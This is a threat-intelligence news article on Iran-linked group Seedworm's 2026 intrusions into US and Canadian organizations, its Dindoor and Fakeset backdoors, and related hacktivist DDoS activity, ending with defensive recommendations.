Iran-linked hackers, identified as the advanced persistent threat (APT) group Seedworm, have been discovered actively infiltrating the networks of multiple U.S. organizations since early February 2026. This intensified cyber threat activity follows recent coordinated military strikes against Iran, raising significant alarms within the cybersecurity community and highlighting a growing geopolitical tension manifesting in the digital realm. The group, also known by aliases such as MuddyWater and Static Kitten, is formally classified by CISA as a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS).
The surge in Seedworm’s operations appears directly linked to the escalation of regional conflict, suggesting Iran’s cyber operatives are leveraging the geopolitical climate as a catalyst for intrusions against American and allied targets. While Iran has engaged in conventional military responses, its cyber capabilities are evidently being deployed as a parallel strategy. Seedworm has been observed operating since at least 2017, and its targeting has expanded over time from primarily Middle Eastern entities to include critical sectors globally, such as telecommunications, defense contracting, local government, and energy organizations across continents.
Researchers at Symantec have identified specific instances of intrusion activities within the networks of a U.S. bank, a U.S. airport, a software company with significant ties to the defense and aerospace industries, and non-governmental organizations in both the United States and Canada. Notably, the Israeli operations of the software company appeared to be a primary focus, with Seedworm potentially exploiting the company’s global footprint as a pathway for lateral movement across its systems. These breaches were reportedly in progress prior to the formal commencement of military hostilities, indicating a sophisticated and pre-emptive positioning strategy by the group.
Further corroboration of Iran’s sustained cyber capabilities comes from the UK’s National Cyber Security Centre. The agency issued a formal alert indicating that Iranian state-aligned actors “almost certainly currently maintain at least some capability to conduct cyber activity,” even amidst disruptions to Iran’s own internet infrastructure. This highlights a critical aspect of modern cyber warfare: threat actors often operate from multiple jurisdictions, making domestic infrastructure issues less impactful on their global operational capacity. Evidence suggests that groups aligned with Iran’s interests, such as the hacktivist collective Handala, have been utilizing the Starlink satellite network for connectivity since mid-January 2026, predating an official Iranian government announcement of widespread internet disruptions.
Beyond Seedworm, other Iran-linked actors have demonstrably amplified their cyber campaigns. The pro-Palestinian hacktivist group DieNet, which emerged in early 2025, has claimed responsibility for distributed denial-of-service (DDoS) attacks targeting various U.S. critical infrastructure sectors, including energy, finance, healthcare, and transportation. Their methods have included TCP SYN floods, DNS amplification, and NTP amplification, contributing to a multifaceted threat landscape that combines state-sponsored espionage with disruptive hacktivist operations.
Seedworm’s Backdoor Deployment and Stealth Persistence
Seedworm’s latest operational repertoire includes the deployment of two newly identified backdoors: Dindoor and Fakeset. Dindoor is a previously unknown backdoor designed to execute via Deno, a secure runtime environment for JavaScript and TypeScript. This unconventional execution method allows Dindoor to evade detection by many standard security tools. The backdoor was discovered on the networks of the software company’s Israeli branch, a U.S. bank, and a Canadian non-profit. It was signed with a digital certificate issued to an entity named “Amy Cherne.”
Fakeset, a backdoor developed in Python, was deployed on the networks of the airport and the non-profit organization. Similar to Dindoor, it was signed using certificates attributed to “Amy Cherne” and “Donald Gay.” The “Donald Gay” certificate is significant, as it had been previously associated with other malware linked to Seedworm, thereby establishing a direct connection between this new activity and the group’s established threat infrastructure. The Stagecomp downloader, also signed with the “Donald Gay” certificate, was instrumental in delivering the Darkcomp backdoor, which has been formally linked to Seedworm by major cybersecurity firms and government agencies including Google, Microsoft, and Kaspersky.
During the intrusion into the software company, attackers also attempted to exfiltrate sensitive data using Rclone, a legitimate file-transfer utility that was repurposed for malicious purposes. The attackers reportedly aimed to transfer files to a Wasabi cloud storage bucket, though the success of this exfiltration attempt remains unconfirmed according to the available intelligence. The coordinated efforts of state-sponsored espionage and hacktivist-driven disruption present a complex and layered threat that requires comprehensive defensive strategies.
Organizations are advised to implement robust security measures to mitigate these evolving threats. This includes enforcing multi-factor authentication across all remote access points, diligently monitoring for anomalous outbound data transfers, and deploying web application firewalls with up-to-date rule sets. Restricting access to external cloud storage services and maintaining offline, immutable backups are crucial for ensuring rapid recovery capabilities following any potential destructive cyber attack. The ongoing geopolitical tensions suggest that cyber activity from Iran-linked actors will likely continue to be a significant concern for critical infrastructure and sensitive organizations globally.